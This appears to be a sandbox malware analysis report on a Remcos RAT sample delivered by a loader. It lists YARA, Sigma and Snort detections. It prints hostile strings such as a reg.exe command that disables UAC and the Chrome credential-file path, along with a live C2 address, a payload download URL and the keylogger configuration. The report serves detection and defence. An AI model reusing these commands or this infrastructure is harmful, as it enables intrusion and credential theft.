3.2.SndVol.exe.5350000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x663c9:$str_a1: C:\Windows\System32\cmd.exe 0x66345:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66345:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66845:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x67075:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66439:$str_b2: Executing file: 0x674b9:$str_b3: GetDirectListeningPort 0x66e65:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66fe5:$str_b7: \update.vbs 0x66461:$str_b9: Downloaded file: 0x6644d:$str_b10: Downloading file: 0x664f1:$str_b12: Failed to upload file: 0x67481:$str_b13: StartForward 0x674a1:$str_b14: StopForward 0x66f3d:$str_b15: fso.DeleteFile " 0x66ed1:$str_b16: On Error Resume Next 0x66f6d:$str_b17: fso.DeleteFolder " 0x664e1:$str_b18: Uploaded file: 0x664a1:$str_b19: Unable to delete: 0x66f05:$str_b20: while fso.FileExists(" 0x6697e:$str_c0: [Firefox StoredLogins not found]
3.2.SndVol.exe.5350000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x662b5:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x66249:$s1: CoGetObject 0x6625d:$s1: CoGetObject 0x66279:$s1: CoGetObject 0x70205:$s1: CoGetObject 0x66209:$s2: Elevation:Administrator!new:
3.2.SndVol.exe.53518cd.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.SndVol.exe.53518cd.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.SndVol.exe.53518cd.2.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
3.2.SndVol.exe.53518cd.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
3.2.SndVol.exe.53518cd.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
3.2.SndVol.exe.53518cd.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
13.2.colorcpl.exe.6f818cd.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6f818cd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.colorcpl.exe.6f818cd.2.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
13.2.colorcpl.exe.6f818cd.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
13.2.colorcpl.exe.6f818cd.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6f818cd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
13.2.colorcpl.exe.6f818cd.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6f818cd.2.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.colorcpl.exe.6f818cd.2.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
13.2.colorcpl.exe.6f818cd.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
13.2.colorcpl.exe.6f818cd.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6f818cd.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
3.2.SndVol.exe.53518cd.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.SndVol.exe.53518cd.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.SndVol.exe.53518cd.2.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
3.2.SndVol.exe.53518cd.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
3.2.SndVol.exe.53518cd.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
3.2.SndVol.exe.53518cd.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
3.2.SndVol.exe.5350000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.SndVol.exe.5350000.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.SndVol.exe.5350000.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
3.2.SndVol.exe.5350000.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b775:$a1: Remcos restarted by watchdog! 0x6bced:$a3: %02i:%02i:%02i:%03i
3.2.SndVol.exe.5350000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x657c9:$str_a1: C:\Windows\System32\cmd.exe 0x65745:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65745:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65c45:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66475:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65839:$str_b2: Executing file: 0x668b9:$str_b3: GetDirectListeningPort 0x66265:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x663e5:$str_b7: \update.vbs 0x65861:$str_b9: Downloaded file: 0x6584d:$str_b10: Downloading file: 0x658f1:$str_b12: Failed to upload file: 0x66881:$str_b13: StartForward 0x668a1:$str_b14: StopForward 0x6633d:$str_b15: fso.DeleteFile " 0x662d1:$str_b16: On Error Resume Next 0x6636d:$str_b17: fso.DeleteFolder " 0x658e1:$str_b18: Uploaded file: 0x658a1:$str_b19: Unable to delete: 0x66305:$str_b20: while fso.FileExists(" 0x65d7e:$str_c0: [Firefox StoredLogins not found]
3.2.SndVol.exe.5350000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x656b5:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65649:$s1: CoGetObject 0x6565d:$s1: CoGetObject 0x65679:$s1: CoGetObject 0x6f605:$s1: CoGetObject 0x65609:$s2: Elevation:Administrator!new:
3.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
3.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.SndVol.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
3.2.SndVol.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
3.2.SndVol.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
3.2.SndVol.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
13.2.colorcpl.exe.6f80000.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.6f80000.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.colorcpl.exe.6f80000.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
13.2.colorcpl.exe.6f80000.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c375:$a1: Remcos restarted by watchdog! 0x6c8ed:$a3: %02i:%02i:%02i:%03i
13.2.colorcpl.exe.6f80000.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x663c9:$str_a1: C:\Windows\System32\cmd.exe 0x66345:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66345:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66845:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x67075:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x66439:$str_b2: Executing file: 0x674b9:$str_b3: GetDirectListeningPort 0x66e65:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66fe5:$str_b7: \update.vbs 0x66461:$str_b9: Downloaded file: 0x6644d:$str_b10: Downloading file: 0x664f1:$str_b12: Failed to upload file: 0x67481:$str_b13: StartForward 0x674a1:$str_b14: StopForward 0x66f3d:$str_b15: fso.DeleteFile " 0x66ed1:$str_b16: On Error Resume Next 0x66f6d:$str_b17: fso.DeleteFolder " 0x664e1:$str_b18: Uploaded file: 0x664a1:$str_b19: Unable to delete: 0x66f05:$str_b20: while fso.FileExists(" 0x6697e:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.6f80000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x662b5:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x66249:$s1: CoGetObject 0x6625d:$s1: CoGetObject 0x66279:$s1: CoGetObject 0x70205:$s1: CoGetObject 0x66209:$s2: Elevation:Administrator!new:
13.2.colorcpl.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.2.colorcpl.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.colorcpl.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
13.2.colorcpl.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
13.2.colorcpl.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
13.2.colorcpl.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
Click to see the 68 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Jsqwmpul.PIF, NewProcessName: C:\Users\Public\Libraries\Jsqwmpul.PIF, OriginalFileName: C:\Users\Public\Libraries\Jsqwmpul.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , ProcessId: 2172, ProcessName: Jsqwmpul.PIF

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Jsqwmpul.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HGTQP09643009.scr.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jsqwmpul

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 13.107.139.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Jsqwmpul.PIF, Initiated: true, ProcessId: 2172, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Jsqwmpul.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\HGTQP09643009.scr.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Jsqwmpul

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Jsqwmpul.PIF, NewProcessName: C:\Users\Public\Libraries\Jsqwmpul.PIF, OriginalFileName: C:\Users\Public\Libraries\Jsqwmpul.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Jsqwmpul.PIF" , ProcessId: 2172, ProcessName: Jsqwmpul.PIF

Sigma detected: Uncommon Child Processes Of SndVol.exe

Source: Process started

Author: X__Junior (Nextron Systems): Data: Command: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr", CommandLine: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\SndVol.exe, NewProcessName: C:\Windows\SysWOW64\SndVol.exe, OriginalFileName: C:\Windows\SysWOW64\SndVol.exe, ParentCommandLine: C:\Windows\System32\SndVol.exe, ParentImage: C:\Windows\SysWOW64\SndVol.exe, ParentProcessId: 6352, ParentProcessName: SndVol.exe, ProcessCommandLine: C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr", ProcessId: 5480, ProcessName: SndVol.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 6352, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort Signatures

ET TROJAN Remcos 3.x Unencrypted Server Response - Source IP: 107.175.229.139 - Destination IP: 192.168.2.5

Timestamp:	05/15/24-01:59:19.345728
SID:	2032777
Source Port:	8087
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Remcos 3.x Unencrypted Checkin - Source IP: 192.168.2.5 - Destination IP: 107.175.229.139

Timestamp:	05/15/24-01:56:51.986638
SID:	2032776
Source Port:	49707
Destination Port:	8087
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing

Found malware configuration

Source: HGTQP09643009.scr.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=6D087DEFFAB8CBA7%21222&authkey=!AEdapl5Mxp8Vyng"]}
Source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "107.175.229.139:8087:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TLPQMO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: 107.175.229.139

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	ReversingLabs: Detection: 60%
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Virustotal: Detection: 60%			Perma Link

Multi AV Scanner detection for submitted file

Source: HGTQP09643009.scr.exe	ReversingLabs: Detection: 60%
Source: HGTQP09643009.scr.exe	Virustotal: Detection: 60%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	3_2_00433837
